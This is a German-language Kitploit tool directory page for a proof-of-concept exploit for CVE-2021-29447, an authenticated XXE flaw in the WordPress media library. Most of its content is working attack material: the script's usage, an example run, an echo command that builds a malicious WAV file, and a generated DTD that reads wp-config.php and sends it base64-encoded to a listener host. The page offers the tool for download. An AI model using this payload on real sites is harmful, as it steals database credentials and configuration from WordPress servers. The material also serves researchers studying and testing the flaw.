Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2021-29447 — Proof-of-Concept-Exploit für CVE-2021-29447: Authentifizierte XXE in der WordPress-Mediathek 5.6-5.7. Erzeugt eine bösartige WAV-Datei und DTD, um beliebige Serverdateien über Out-of-Band-Datenexfiltration auszulesen. | Kitploit
Tools/GitHubGitHub/g01d3nw01f/cve-2021-29447
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstests
GitHubg01d3nw01f/cve-2021-29447

CVE-2021-29447

Proof-of-Concept-Exploit für CVE-2021-29447: Authentifizierte XXE in der WordPress-Mediathek 5.6-5.7. Erzeugt eine bösartige WAV-Datei und DTD, um beliebige Serverdateien über Out-of-Band-Datenexfiltration auszulesen.

Repository anzeigen
vor 3 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2021-29447 WordPress 5.6-5.7 - Authentifiziert (Autor+) XXE

https://blog.wpsec.com/wordpress-xxe-in-media-library-cve-2021-29447/

Verwendung:

-l LHOST Beispiel: 127.0.0.1 -n NAME Beispiel: payload.wav -dn DTD_NAME Beispiel: evil.dtd -r READ Beispiel: ../wp-config.php

evil-wav-dtd-xxe.py: Fehler: die folgenden Argumente sind erforderlich: -l/--lhost, -n/--name, -dn/--dtd, -r/--read

Beispiel für die Skriptausführung:

./evil-wav-dtd-xxe.py -l 127.0.0.1 -n payload.wav -dn evil.dtd -r "../wp-config.php"

root@kitploit:~
[*]Created: evil.dtd
-------------------------------------------------------------------------
-- below commands run in terminal directory: generate the .wav file   --
-------------------------------------------------------------------------
echo -en 'RIFF\x85\x00\x00\x00WAVEiXML\x79\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://127.0.0.1/evil.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav

evil.dtd(automatisch generiert)

root@kitploit:~
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=../wp-config.php">
<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://127.0.0.1/?p=%file;'>" >
Tool herunterladen